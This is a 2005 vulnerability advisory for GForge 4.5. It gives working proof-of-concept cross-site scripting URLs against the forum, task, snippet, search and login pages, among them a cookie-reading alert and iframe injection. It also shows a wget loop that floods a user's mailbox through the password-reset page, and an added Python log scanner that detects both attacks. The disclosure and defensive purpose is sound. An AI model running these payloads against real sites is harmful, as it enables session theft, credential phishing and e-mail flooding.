---------------------------------------------------------------------------
Various Vulnerabilities in GForge
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GForge - 4.5 (Current)
GForge has tools to help your team collaborate, like message forums and
mailing lists; tools to create and control access to Source Code Management
repositories like CVS and Subversion. GForge automatically creates a repository
and controls access to it depending on the role settings of the project.
Web : http://gforge.org/
---------------------------------------------------------------------------
A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.- In the Forum Module:
http://[target]/forum/forum.php?forum_id="><script>alert('hi')</script>
http://[target]/forum/forum.php?group_id="><script>alert('hi')</script>
(NOTE: The group_id parameter is ALWAYS vulnerable.)
2.- In the Task Module:
http://[target]/pm/task.php?func=detailtask&project_task_id="><h1>hi!</h1>&group_id=1&group_project_id=3
3.- In the Snippets Module:
http://[target]/snippet/detail.php?type=snippet&id=21"><iframe%20src=http://www.playboy.com></iframe><font%20size="
4.- In the search engine:
To try it, simply enter any valid XSS test such as "><h1>hi!!!</h1> in the
search field and press enter, or try the following URL:
http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%3E&Search=Search
5.- In other modules:
http://[target]//frs/admin/qrs.php?group_id="><script>alert(document.cookie)</script>
http://[target]/notepad.php?form=parent;%0d%0a-->%0d%0a</script><body><h1>hi!</h1></body></html><!--
NOTE: The rows, cols and wrap parameters are also vulnerable.
6.- In the Login Form:
The login form is also vulnerable to XSS (Cross Site Scripting) attacks. This may
be used to launch phishing attacks by sending HTML e-mails (e.g. saying that you
need to upgrade to the latest GForge version due to a security problem) that
contain an HTML link pointing to a specially crafted URL. That URL inserts an
HTML form into the GForge login page, and when the user presses the login
button, his/her credentials are sent to the attacker's website.
POC. To "play" with this, simply go to the login page and insert the following
text in the login field:
"><iframe src=http://www.playboy.com></iframe><font size="
B) E-Mail Flood
~~~~~~~~~~~~~~~
The 'forgot your password?' feature allows a remote user to load a certain URL
to cause the service to send a validation e-mail to the specified user's e-mail
address. There is no limit to the number of messages sent over a period of
time, so a remote user can flood the target user's secondary e-mail address
(e-mail flood / e-mail bomber).
The following is a "Proof Of Concept" of this vulnerability:
[joxean@nemobox]$ while [ true ]; do
> wget http://[target]/account/lostpw.php?loginname=joxean
> done
The "pending account" confirmation e-mail is also vulnerable, so a malicious
user can flood any e-mail box even if they are not registered GForge users.
The fix:
~~~~~~~~
There is no fix at the moment.
Workarounds:
~~~~~~~~~~~~
There are no workarounds except by using a method to automagically catch the
XSS request such as WASP (available via CVS at https://savannah.nongnu.org/wasp)
or mod_security (available at http://www.modsecurity.org/) for Apache Web
Servers.
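As an added example (not part of the advisory), the following Python script shows how a defender could spot both issue classes in Apache access logs: requests whose URL-decoded parameters carry HTML metacharacters (the section A requests that the WASP/mod_security workaround is meant to catch) and repeated lostpw.php hits for one loginname from one source (section B). The log lines are constructed for this example, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Constructed sample Apache access-log lines (not from the advisory), mirroring sections A and B.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jul/2005:10:00:01 +0000] "GET /account/lostpw.php?loginname=joxean HTTP/1.0" 200 512
10.0.0.5 - - [27/Jul/2005:10:00:02 +0000] "GET /account/lostpw.php?loginname=joxean HTTP/1.0" 200 512
10.0.0.5 - - [27/Jul/2005:10:00:03 +0000] "GET /account/lostpw.php?loginname=joxean HTTP/1.0" 200 512
10.0.0.9 - - [27/Jul/2005:10:05:00 +0000] "GET /forum/forum.php?forum_id=7&group_id=%22%3E%3Cscript%3Ealert('hi')%3C/script%3E HTTP/1.0" 200 2048
10.0.0.7 - - [27/Jul/2005:10:06:00 +0000] "GET /forum/forum.php?forum_id=7&group_id=12 HTTP/1.0" 200 2048
10.0.0.7 - - [27/Jul/2005:11:00:00 +0000] "GET /account/lostpw.php?loginname=alice HTTP/1.0" 200 512
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) [^"]*" \d{3}')
HTML_META = set('<>"')  # never legitimate inside a numeric id such as group_id or forum_id
def parse_line(line):
    """Return ip, timestamp, path and URL-decoded query params, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {"ip": m.group("ip"),
            "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "path": parts.path,
            "params": dict(parse_qsl(parts.query, keep_blank_values=True))}  # parse_qsl decodes %XX
def records(log_text):
    return [r for r in map(parse_line, log_text.splitlines()) if r]
def find_xss_attempts(log_text):
    """Section A: flag requests whose decoded query values carry HTML metacharacters."""
    return [(r["ip"], r["path"], name) for r in records(log_text)
            for name, value in r["params"].items() if HTML_META & set(value)]

def find_lostpw_floods(log_text, threshold=3, window_seconds=60):
    """Section B: flag (ip, loginname) pairs hitting lostpw.php >= threshold times inside one window."""
    times = defaultdict(list)
    for r in records(log_text):
        if r["path"].endswith("/account/lostpw.php"):
            times[(r["ip"], r["params"].get("loginname", ""))].append(r["time"])
    floods = {}
    for key, stamps in times.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over sorted timestamps
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                floods[key] = max(floods.get(key, 0), end - start + 1)
    return floods
```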
Timeline:
~~~~~~~~~
25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (without interest in fixing bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es